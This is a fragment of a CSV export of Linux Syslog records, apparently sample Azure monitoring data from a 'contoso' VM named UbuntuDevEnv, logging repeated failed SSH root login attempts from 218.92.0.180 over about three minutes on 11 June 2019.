+7818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:13,UbuntuDevEnv,2019-06-11 14:08:13,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 22299: Too many authentication failures [preauth],104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,22299,,
+7819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:13,UbuntuDevEnv,2019-06-11 14:08:13,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:18,UbuntuDevEnv,2019-06-11 14:08:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:20,UbuntuDevEnv,2019-06-11 14:08:20,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 39122 ssh2,104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,39122,,
+7822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:35,UbuntuDevEnv,2019-06-11 14:08:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 39122 ssh2 [preauth],104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,39122,,
+7823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:35,UbuntuDevEnv,2019-06-11 14:08:35,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 39122 ssh2],104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,39122,,
+7824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:35,UbuntuDevEnv,2019-06-11 14:08:35,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 39122: Too many authentication failures [preauth],104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,39122,,
+7825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:35,UbuntuDevEnv,2019-06-11 14:08:35,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:35,UbuntuDevEnv,2019-06-11 14:08:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,104869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:41,UbuntuDevEnv,2019-06-11 14:08:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:43,UbuntuDevEnv,2019-06-11 14:08:43,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 56099 ssh2,104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56099,,
+7829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:58,UbuntuDevEnv,2019-06-11 14:08:58,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 56099 ssh2],104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56099,,
+7830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:58,UbuntuDevEnv,2019-06-11 14:08:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 56099 ssh2 [preauth],104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56099,,
+7831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:58,UbuntuDevEnv,2019-06-11 14:08:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:58,UbuntuDevEnv,2019-06-11 14:08:58,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 56099: Too many authentication failures [preauth],104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,56099,,
+7833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:58,UbuntuDevEnv,2019-06-11 14:08:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,104944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:03,UbuntuDevEnv,2019-06-11 14:09:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:06,UbuntuDevEnv,2019-06-11 14:09:05,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 9532 ssh2,105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,9532,,
+7836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:21,UbuntuDevEnv,2019-06-11 14:09:21,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 9532: Too many authentication failures [preauth],105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,9532,,
+7837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:21,UbuntuDevEnv,2019-06-11 14:09:21,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 9532 ssh2],105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,9532,,
+7838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:21,UbuntuDevEnv,2019-06-11 14:09:21,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:21,UbuntuDevEnv,2019-06-11 14:09:21,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 9532 ssh2 [preauth],105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,9532,,
+7840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:21,UbuntuDevEnv,2019-06-11 14:09:21,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:28,UbuntuDevEnv,2019-06-11 14:09:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:30,UbuntuDevEnv,2019-06-11 14:09:30,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 27317 ssh2,105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,27317,,
+7843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:40,UbuntuDevEnv,2019-06-11 14:09:36,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.180 port 27317 ssh2],105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,27317,,
+7844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:40,UbuntuDevEnv,2019-06-11 14:09:40,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 27317 ssh2,105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,27317,,
+7845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:47,UbuntuDevEnv,2019-06-11 14:09:46,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:47,UbuntuDevEnv,2019-06-11 14:09:46,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 27317: Too many authentication failures [preauth],105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,27317,,
+7847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:47,UbuntuDevEnv,2019-06-11 14:09:46,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.180 port 27317 ssh2],105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,27317,,
+7848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:47,UbuntuDevEnv,2019-06-11 14:09:46,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:47,UbuntuDevEnv,2019-06-11 14:09:46,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 27317 ssh2 [preauth],105111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,27317,,
+7850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:53,UbuntuDevEnv,2019-06-11 14:09:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:09:55,UbuntuDevEnv,2019-06-11 14:09:54,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 46425 ssh2,105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46425,,
+7852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:02,UbuntuDevEnv,2019-06-11 14:10:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.180 port 46425 ssh2],105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46425,,
+7853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:05,UbuntuDevEnv,2019-06-11 14:10:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 46425 ssh2,105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46425,,
+7854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:11,UbuntuDevEnv,2019-06-11 14:10:10,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.180 port 46425 ssh2],105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46425,,
+7855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:11,UbuntuDevEnv,2019-06-11 14:10:10,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 46425 ssh2 [preauth],105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46425,,
+7856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:11,UbuntuDevEnv,2019-06-11 14:10:10,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:11,UbuntuDevEnv,2019-06-11 14:10:10,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:11,UbuntuDevEnv,2019-06-11 14:10:10,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 46425: Too many authentication failures [preauth],105209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,46425,,
+7859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:20,UbuntuDevEnv,2019-06-11 14:10:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:22,UbuntuDevEnv,2019-06-11 14:10:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 64202 ssh2,105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,64202,,
+7861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:38,UbuntuDevEnv,2019-06-11 14:10:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 64202 ssh2 [preauth],105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,64202,,
+7862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:38,UbuntuDevEnv,2019-06-11 14:10:37,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 64202 ssh2],105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,64202,,
+7863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:38,UbuntuDevEnv,2019-06-11 14:10:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 64202: Too many authentication failures [preauth],105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,64202,,
+7864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:38,UbuntuDevEnv,2019-06-11 14:10:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:38,UbuntuDevEnv,2019-06-11 14:10:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:42,UbuntuDevEnv,2019-06-11 14:10:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:10:44,UbuntuDevEnv,2019-06-11 14:10:44,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 19874 ssh2,105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19874,,
+7868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:01,UbuntuDevEnv,2019-06-11 14:11:01,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:01,UbuntuDevEnv,2019-06-11 14:11:01,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 19874: Too many authentication failures [preauth],105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,19874,,
+7870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:01,UbuntuDevEnv,2019-06-11 14:11:01,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 19874 ssh2 [preauth],105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19874,,
+7871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:01,UbuntuDevEnv,2019-06-11 14:11:01,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:01,UbuntuDevEnv,2019-06-11 14:11:01,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 19874 ssh2],105387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19874,,
+7873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:06,UbuntuDevEnv,2019-06-11 14:11:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:08,UbuntuDevEnv,2019-06-11 14:11:07,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 37397 ssh2,105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,37397,,
+7875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:23,UbuntuDevEnv,2019-06-11 14:11:22,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 37397 ssh2],105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,37397,,
